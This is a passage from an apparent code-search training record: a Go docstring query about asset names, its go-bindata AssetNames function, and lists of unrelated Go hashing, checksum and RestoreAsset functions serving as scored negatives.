<-done:\n\t\t\treturn commonErr\n\t\t}\n\t}\n}", "func hash(fn string) (res string) {\n\th := sha256.New()\n\n\tfi, err := os.Stat(fn)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tf, err := os.Open(fn)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tdefer f.Close()\n\n\tif fi.IsDir() {\n\t\tns, err := f.Readdirnames(0)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tfor _, e := range ns {\n\t\t\th.Write([]byte(e))\n\t\t}\n\t} else {\n\t\tif _, err := io.Copy(h, f); err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn string(h.Sum(nil))\n}", "func MD5All(roots []string) (map[string][md5.Size]byte, error) {\n\t// MD5All closes the done channel when it returns; it may do so before\n\t// receiving all the values from c and errc.\n\tnumBackend := runtime.NumCPU()\n\n\t// These channels link the different stages together:\n\tinputChan := make(chan interface{}, numBackend*2)\n\tfileChan := make(chan interface{}, numBackend*2)\n\toutputChan := make(chan interface{})\n\tquitChan := make(chan struct{})\n\n\terrChan := make(chan error)\n\n\t// Control number of spawned goroutines here:\n\tfirstWg := sync.WaitGroup{}\n\tsecondWg := sync.WaitGroup{}\n\tlastWg := sync.WaitGroup{}\n\n\t// These define how the stages connect to each stage\n\t// Note that the input for pipe2 is the output of pipe1\n\tpipe1 := Pipes{\n\t\tInput: inputChan,\n\t\tOutput: fileChan,\n\t\tErr: errChan,\n\t\tQuit: quitChan,\n\t\tDone: &firstWg,\n\t}\n\tpipe2 := Pipes{\n\t\tInput: fileChan,\n\t\tOutput: outputChan,\n\t\tErr: errChan,\n\t\tQuit: quitChan,\n\t\tDone: &secondWg,\n\t}\n\t// More concisely, the last stage:\n\tpipe3 := Pipes{outputChan, nil, errChan, quitChan, &lastWg}\n\n\tfor i := 0; i < numBackend; i++ {\n\t\t// 1st stage\n\t\tfirstWg.Add(1)\n\t\tgo walkFiles(pipe1)\n\t}\n\tfor i := 0; i < numBackend; i++ {\n\t\t// 2nd stage\n\t\tsecondWg.Add(1)\n\t\tgo digester(pipe2)\n\t}\n\n\t// We don't really stream the results, just collect them in\n\t// final stage in one map:\n\tm := make(map[string][md5.Size]byte)\n\n\t// Final stage, the \"reduce\" of this pipeline. One goroutine only\n\tlastWg.Add(1) // Only one goroutine!\n\tgo func(p Pipes) {\n\t\tdefer p.Done.Done()\n\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase r := <-p.Input:\n\t\t\t\tif r == nil {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif r.(result).err != nil {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tm[r.(result).path] = r.(result).sum\n\t\t\tcase <-p.Quit:\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}(pipe3)\n\n\t// All set up, so send the input down the pipes we set up:\n\tfor _, root := range roots {\n\t\tinputChan <- root\n\t}\n\n\t// This is the test part to force all goroutines to gracefully quit\n\t// after 3 seconds: this simulates a deadline:\n\tgo func() {\n\t\ttime.Sleep(time.Second * 3)\n\t\tfor i := 0; i < numBackend*2+1; i++ {\n\t\t\tquitChan <- struct{}{}\n\t\t}\n\t}()\n\n\t// Now we're done input:\n\tclose(inputChan)\n\t// Wait for first pipes to clear:\n\tfirstWg.Wait()\n\tclose(fileChan)\n\t// Wait for 2nd stage pipes to clear:\n\tsecondWg.Wait()\n\tclose(outputChan)\n\t// Wait for final pipe to clear:\n\tlastWg.Wait()\n\n\treturn m, nil\n}", "func NewDigests(appliedRuleset *rulesets.AppliedRulesetSummary, statuses []scanner.ScanStatus) ([]Digest, error) {\n\tds := make([]Digest, 0)\n\terrs := make([]string, 0, 0)\n\n\tfor i := range statuses {\n\t\ts := statuses[i]\n\n\t\tvar e *scans.Evaluation\n\t\tif appliedRuleset != nil && appliedRuleset.RuleEvaluationSummary != nil {\n\t\t\tfor i := range appliedRuleset.RuleEvaluationSummary.Ruleresults {\n\t\t\t\tif appliedRuleset.RuleEvaluationSummary.Ruleresults[i].ID == s.ID {\n\t\t\t\t\te = &appliedRuleset.RuleEvaluationSummary.Ruleresults[i]\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\td, err := _newDigests(&s, e)\n\t\tif err != nil {\n\t\t\terrs = append(errs, fmt.Sprintf(\"failed to make digest(s) from scan: %v\", err.Error()))\n\t\t\tcontinue\n\t\t}\n\n\t\tds = append(ds, d...)\n\t}\n\n\tsort.Slice(ds, func(i, j int) bool { return ds[i].Index < ds[j].Index })\n\n\tif len(errs) > 0 {\n\t\treturn ds, fmt.Errorf(\"failed to make some digests: %v\", strings.Join(errs, \"; \"))\n\t}\n\n\treturn ds, nil\n}", "func (t *File) Hash() [32]byte {\n\tvar out [32]byte\n\th := sha256.New()\n\tbinary.Write(h, binary.LittleEndian, uint32(len(t.Name)))\n\th.Write([]byte(t.Name))\n\th.Write(t.MetafileHash)\n\tcopy(out[:], h.Sum(nil))\n\treturn out\n}", "func calculateSHA256s(path string) ([]checksumSHA256, error) {\n\tvar checksums []checksumSHA256\n\tpath = fmt.Sprintf(\"%s%c\", filepath.Clean(path), filepath.Separator)\n\tcalculateSHA256 := func(filepath string, f os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif f.IsDir() {\n\t\t\treturn nil\n\t\t}\n\n\t\tfile, err := os.Open(filepath)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer file.Close()\n\n\t\thash := sha256.New()\n\t\tif _, err = io.Copy(hash, file); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tchecksums = append(checksums, checksumSHA256{\n\t\t\tfilename: strings.TrimPrefix(filepath, path),\n\t\t\tchecksum: hash.Sum(nil),\n\t\t})\n\n\t\treturn nil\n\t}\n\tif err := filepath.Walk(path, calculateSHA256); err != nil {\n\t\treturn nil, err\n\t}\n\treturn checksums, nil\n}", "func recursiveHash(dir string, fout string) {\n\tf, err := os.Create(fout)\n\tif err != nil {\n\t\tlog.Print(err)\n\t}\n\tdefer f.Close()\n\tfilepath.Walk(dir, func(path string, file os.FileInfo, _ error) error {\n\t\tif !file.IsDir() {\n\t\t\tfileData, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(err)\n\t\t\t}\n\t\t\trel, err := filepath.Rel(dir, path)\n\t\t\tif err != nil {\n\t\t\t\tlog.Print(err)\n\t\t\t}\n\t\t\tfmt.Printf(\"%x *%s\\n\", md5.Sum(fileData), rel)\n\t\t\tvalue := md5.Sum(fileData)\n\n\t\t\ts := hex.EncodeToString(value[:]) + \" *\" + rel + \"\\n\"\n\t\t\tf.WriteString(s)\n\t\t}\n\t\treturn nil\n\t})\n\tf.Sync()\n}", "func hashedDigestsForSSH(sshPK ssh.PublicKey, v23PK, purpose, message []byte) ([]byte, security.Hash, error) {\n\thashName, hasher := hashForSSHKey(sshPK)\n\tsum, err := digest(hasher, v23PK, message, purpose)\n\tif err != nil {\n\t\treturn nil, hashName, err\n\t}\n\thasher.Reset()\n\thasher.Write(sum)\n\treturn hasher.Sum(nil), hashName, nil\n}", "func getFilesFromSources(p string, r io.Reader) ([]*FileInfo, Paragraph, error) {\n\tvar l []*FileInfo\n\tparser := NewParser(r)\n\n\tfor {\n\t\td, err := parser.Read()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, nil, errors.Wrap(err, \"parser.Read\")\n\t\t}\n\n\t\tdir, ok := d[\"Directory\"]\n\t\tif !ok {\n\t\t\treturn nil, nil, errors.New(\"no Directory in \" + p)\n\t\t}\n\t\tfiles, ok := d[\"Files\"]\n\t\tif !ok {\n\t\t\treturn nil, nil, errors.New(\"no Files in \" + p)\n\t\t}\n\n\t\tm := make(map[string]*FileInfo)\n\t\tfor _, l := range files {\n\t\t\tfname, size, csum, err := parseChecksum(l)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for Files\")\n\t\t\t}\n\n\t\t\tfpath := path.Clean(path.Join(dir[0], fname))\n\t\t\tfi := &FileInfo{\n\t\t\t\tpath: fpath,\n\t\t\t\tsize: size,\n\t\t\t\tmd5sum: csum,\n\t\t\t}\n\t\t\tm[fpath] = fi\n\t\t}\n\n\t\tfor _, l := range d[\"Checksums-Sha1\"] {\n\t\t\tfname, _, csum, err := parseChecksum(l)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for Checksums-Sha1\")\n\t\t\t}\n\n\t\t\tfpath := path.Clean(path.Join(dir[0], fname))\n\t\t\tfi, ok := m[fpath]\n\t\t\tif !ok {\n\t\t\t\treturn nil, nil, errors.New(\"mismatch between Files and Checksums-Sha1 in \" + p)\n\t\t\t}\n\t\t\tfi.sha1sum = csum\n\t\t}\n\n\t\tfor _, l := range d[\"Checksums-Sha256\"] {\n\t\t\tfname, _, csum, err := parseChecksum(l)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, nil, errors.Wrap(err, \"parseChecksum for Checksums-Sha256\")\n\t\t\t}\n\n\t\t\tfpath := path.Clean(path.Join(dir[0], fname))\n\t\t\tfi, ok := m[fpath]\n\t\t\tif !ok {\n\t\t\t\treturn nil, nil, errors.New(\"mismatch between Files and Checksums-Sha256 in \" + p)\n\t\t\t}\n\t\t\tfi.sha256sum = csum\n\t\t}\n\n\t\tfor _, fi := range m {\n\t\t\tl = append(l, fi)\n\t\t}\n\t}\n\n\treturn l, nil, nil\n}", "func Sum(m types.Metadata) (string, error) {\n\t// Open the file.\n\tfile, err := os.Open(m.File())\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Defer closing it.\n\tdefer file.Close()\n\n\t// Make a new hash object.\n\thash := sha256.New()\n\n\t// Copy the file to the hasher object.\n\t_, err = io.Copy(hash, file)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Calculate the hash and return it.\n\treturn hex.EncodeToString(hash.Sum(nil)), err\n}", "func (fs *Searcher) combineChecksums(checksums [][]byte) ([]byte, error) {\n\tif len(checksums) == 1 {\n\t\treturn checksums[0], nil\n\t}\n\n\tvar total []byte\n\tfor _, chksum := range checksums {\n\t\ttotal = append(total, chksum...)\n\t}\n\n\tnewChecksum := crc32.ChecksumIEEE(total)\n\tbuf := bytes.NewBuffer(make([]byte, 0, 4))\n\terr := binary.Write(buf, binary.LittleEndian, &newChecksum)\n\treturn buf.Bytes(), err\n}", "func HashFile(path string) (hashes FileInfo, err error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tdefer f.Close()\n\n\treader := bufio.NewReader(f)\n\n\tvar writers []io.Writer\n\n\thsha1 := newHasher(sha1.New(), &hashes.Sha1)\n\tdefer hsha1.Close()\n\twriters = append(writers, hsha1)\n\thsha256 := newHasher(sha256.New(), &hashes.Sha256)\n\tdefer hsha256.Close()\n\twriters = append(writers, hsha256)\n\thmd5 := newHasher(md5.New(), &hashes.Md5)\n\tdefer hmd5.Close()\n\twriters = append(writers, hmd5)\n\n\tif len(writers) == 0 {\n\t\treturn\n\t}\n\n\tw := io.MultiWriter(writers...)\n\n\t_, err = io.Copy(w, reader)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func calcHashSum(s string) ([]byte, error) {\n\t// Open the file.\n\tfile, err := os.Open(s)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer file.Close()\n\n\t// Get a new hash value.\n\th := md5.New()\n\n\t// Read line by line and add to the hash sum.\n\tscanner := bufio.NewScanner(file)\n\tfor scanner.Scan() {\n\t\tif err := scanner.Err(); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tio.WriteString(h, scanner.Text())\n\t}\n\n\treturn h.Sum(nil), nil\n}", "func digestsForSSH(sshPK ssh.PublicKey, v23PK, purpose, message []byte) ([]byte, security.Hash, error) {\n\thashName, hasher := hashForSSHKey(sshPK)\n\tsum, err := digest(hasher, v23PK, message, purpose)\n\tif err != nil {\n\t\treturn nil, hashName, err\n\t}\n\treturn sum, hashName, nil\n}", "func (e *Entity) ReadChecksums(filePath string) error {\n\tif e.Checksum == nil {\n\t\te.Checksum = map[string]string{}\n\t}\n\tfile, err := os.Open(filePath)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"opening file for reading: \"+filePath+\" :%w\", err)\n\t}\n\tdefer file.Close()\n\t// TODO: Make this line like the others once this PR is\n\t// included in a k-sigs/release-util release:\n\t// https://github.com/kubernetes-sigs/release-utils/pull/16\n\ts1, err := hash.ForFile(filePath, sha1.New())\n\tif err != nil {\n\t\treturn fmt.Errorf(\"getting sha1 sum for file: %w\", err)\n\t}\n\ts256, err := hash.SHA256ForFile(filePath)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"getting file checksums: %w\", err)\n\t}\n\ts512, err := hash.SHA512ForFile(filePath)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"getting file checksums: %w\", err)\n\t}\n\n\te.Checksum = map[string]string{\n\t\t\"SHA1\": s1,\n\t\t\"SHA256\": s256,\n\t\t\"SHA512\": s512,\n\t}\n\treturn nil\n}", "func GetHashSum() []byte {\n\tpaths := []string{\n\t\tconfigPath,\n\t\t\"/etc/scrt/service-template/sqlUser\",\n\t\t\"/etc/scrt/service-template/sqlPassword\",\n\t}\n\th := sha256.New()\n\n\tfor _, p := range paths {\n\t\tf, err := os.Open(p)\n\t\tif err != nil {\n\t\t\treturn nil\n\t\t}\n\t\tdefer f.Close()\n\t\tif _, err = io.Copy(h, f); err != nil {\n\t\t\treturn nil\n\t\t}\n\t}\n\n\treturn h.Sum(nil)\n}", "func GetAllEncryptedSums(f *shade.File) (encryptedSums [][]byte, err error) {\n\tif f == nil {\n\t\treturn nil, errors.New(\"provide a file pointer to Get an encrypted chunk\")\n\t}\n\tencryptedSums = make([][]byte, len(f.Chunks))\n\tfor i, chunk := range f.Chunks {\n\t\tif chunk.Nonce == nil {\n\t\t\treturn nil, fmt.Errorf(\"no Nonce in Chunk %d: %x\", i, chunk.Sha256)\n\t\t}\n\t\tencryptedSums[i], err = encryptUnsafe(chunk.Sha256, f.AesKey, chunk.Nonce)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn encryptedSums, nil\n}", "func (b *Bag) GenerateChecksums() error {\n\tvar err error\n\tvar realroot string\n\n\trealroot, err = filepath.Abs(b.root)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"unable to determine bag's absolute root path from %q: %s\", b.root, err)\n\t}\n\tb.root = realroot\n\n\tvar dataPath = filepath.Join(b.root, \"data\")\n\tif !fileutil.IsDir(dataPath) {\n\t\treturn fmt.Errorf(\"%q is not a directory\", dataPath)\n\t}\n\n\tb.Checksums = nil\n\terr = filepath.Walk(dataPath, func(path string, info os.FileInfo, err error) error {\n\t\tif info.Mode().IsRegular() {\n\t\t\tvar chksum, err = b.getsum(path)\n\t\t\tif err == nil {\n\t\t\t\tb.Checksums = append(b.Checksums, chksum)\n\t\t\t}\n\t\t\treturn err\n\t\t}\n\n\t\treturn nil\n\t})\n\n\treturn err\n}", "func (m MMR) Digest() Path {\n\tvar path Path\n\tfor _, p := range m.peaks {\n\t\tpath = append(path, PathEntry{op: PUSHPOS, pos: p})\n\t}\n\treturn path\n}", "func commitsByRepo() (map[string][]string, error) {\n\tinfos, err := os.ReadDir(indexDir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcommitsByRepo := map[string][]string{}\n\tfor _, info := range infos {\n\t\tif matches := indexFilenamePattern.FindStringSubmatch(info.Name()); len(matches) > 0 {\n\t\t\tcommitsByRepo[matches[1]] = append(commitsByRepo[matches[1]], matches[2])\n\t\t}\n\t}\n\n\treturn commitsByRepo, nil\n}", "func (s *FileCollector) Collect() error {\n\tfor _, inputVal := range s.Paths {\n\t\t// inputVal is of type sda:/path/to/file\n\t\terr := HashFile(inputVal)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"File Collector: input=%s, err = %v\", inputVal, err)\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func copyFilegroupHashes(state *core.BuildState, target *core.BuildTarget) {\n\toutDir := target.OutDir()\n\tlocalSources := target.AllSourceLocalPaths(state.Graph)\n\tfor i, source := range target.AllSourceFullPaths(state.Graph) {\n\t\tif out := filepath.Join(outDir, localSources[i]); out != source {\n\t\t\tstate.PathHasher.CopyHash(source, out)\n\t\t}\n\t}\n}", "func (f *Fs) Hashes() hash.Set {\n\treturn hash.Set(hash.MD5)\n}", "func WriteCacheChecksums(suffix string, cacheDir string, paths []string) error {\n\tcheckBeforeFilename := filepath.Join(cacheDir, \"md5sums_\"+suffix)\n\tcheckBefore, err := os.OpenFile(checkBeforeFilename, os.O_RDWR|os.O_APPEND|os.O_CREATE, 0755)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer checkBefore.Close()\n\n\thashes := []string{}\n\tfor _, path := range paths {\n\t\terr = filepath.Walk(path, func(p string, info os.FileInfo, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\thash, err := hashFile(p)\n\t\t\thashes = append(hashes, fmt.Sprintf(\"%s %s\", hash, p))\n\t\t\treturn err\n\t\t})\n\t}\n\n\tsort.Strings(hashes)\n\n\tw := bufio.NewWriter(checkBefore)\n\tfor _, line := range hashes {\n\t\tfmt.Fprintln(w, line)\n\t}\n\treturn w.Flush()\n}", "func printHashes(results <-chan FileInfo, hashType string) (int64, int64, []error) {\n\tvar totalFileSize int64\n\tvar numFiles int64\n\tvar errors []error\n\tfor info := range results {\n\t\tif info.Error != nil {\n\t\t\terrors = append(errors, info.Error)\n\t\t\tcontinue\n\t\t}\n\t\tnumFiles++\n\t\ttotalFileSize += int64(info.Size)\n\t\tfmt.Printf(\"%s,\\\"%s\\\",%s\\n\", hashType, info.Path, info.Hash)\n\t}\n\treturn totalFileSize, numFiles, errors\n}", "func FindAllFiles(rootdir string, mask []string) (files map[string]string, err error) {\n\tdirs := make(map[string]string)\n\tfiles = make(map[string]string)\n\n\tdirs, err = FindFiles(rootdir, []string{\"*\"})\n\tif err != nil {\n\t\tlog.Fatalf(\"FindAllFiles: FindAllFiles error: %v\", err)\n\t}\n\n\tfor k := range dirs {\n\t\tf, err := FindFiles(k, []string{\"*.*\"})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"FindAllFiles: FindAllFiles error: %v\", err)\n\t\t}\n\n\t\tfor kk, vv := range f {\n\t\t\tfiles[kk] = vv\n\t\t}\n\t}\n\treturn files, err\n}", "func (d *GitDir) Refs() (map[string]core.Hash, error) {\n\tvar err error\n\n\td.refs = make(map[string]core.Hash)\n\n\tif err = d.addRefsFromPackedRefs(); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err = d.addRefsFromRefDir(); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn d.refs, err\n}", "func hashFile(file io.Reader) []byte {\n\thash := suite.Hash()\n\tbuflen := 1024 * 1024\n\tbuf := make([]byte, buflen)\n\tread := buflen\n\tfor read == buflen {\n\t\tvar err error\n\t\tread, err = file.Read(buf)\n\t\tif err != nil && err != io.EOF {\n\t\t\tdbg.Fatal(\"Error while reading bytes\")\n\t\t}\n\t\thash.Write(buf)\n\t}\n\treturn hash.Sum(nil)\n}", "func Hashcalc(filename string) (Hashval, error) {\n\tr, err := GetHashForFile(filename)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\treturn internHash(r), nil\n}", "func DirHash(path string) (finalHash string, err error) {\n\thash := md5.New()\n\n\terr = filepath.Walk(path, func(path string, info os.FileInfo, err error) (err2 error) {\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tio.WriteString(hash, path)\n\n\t\tfmt.Fprintf(hash, \"%v\", info.IsDir())\n\t\tfmt.Fprintf(hash, \"%v\", info.ModTime())\n\t\tfmt.Fprintf(hash, \"%v\", info.Mode())\n\t\tfmt.Fprintf(hash, \"%v\", info.Name())\n\t\tfmt.Fprintf(hash, \"%v\", info.Size())\n\t\treturn\n\t})\n\tif err != nil {\n\t\treturn\n\t}\n\n\tfinalHash = fmt.Sprintf(\"%x\", hash.Sum(nil))\n\treturn\n}" ]
[ "0.6962257", "0.6857267", "0.6500901", "0.64340717", "0.6351849", "0.6168927", "0.6060193", "0.6027875", "0.5841485", "0.58326197", "0.5764696", "0.57436156", "0.5716916", "0.5619292", "0.5611238", "0.56094915", "0.55823195", "0.5540355", "0.5539558", "0.55263436", "0.54708636", "0.5469622", "0.5447435", "0.54164386", "0.53611475", "0.53385925", "0.52997947", "0.5298761", "0.5273952", "0.52257097", "0.5205912", "0.51886225", "0.5159227", "0.5146557", "0.5141931", "0.51346743", "0.5129186", "0.5126566", "0.5126346", "0.5122437", "0.51164675", "0.5114642", "0.51122075", "0.5109352", "0.5106089", "0.5061447", "0.50579965" ]
0.69082654
47
AssetNames returns the names of the assets.
func AssetNames() []string { names := make([]string, 0, len(_bindata)) for name := range _bindata { names = append(names, name) } return names }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[]
[]
0.0
-1
RestoreAsset restores an asset under the given directory.
func RestoreAsset(dir, name string) error { data, err := Asset(name) if err != nil { return err } info, err := AssetInfo(name) if err != nil { return err } err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755)) if err != nil { return err } err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode()) if err != nil { return err } return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime()) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, path.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, path.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, path.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, path.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = 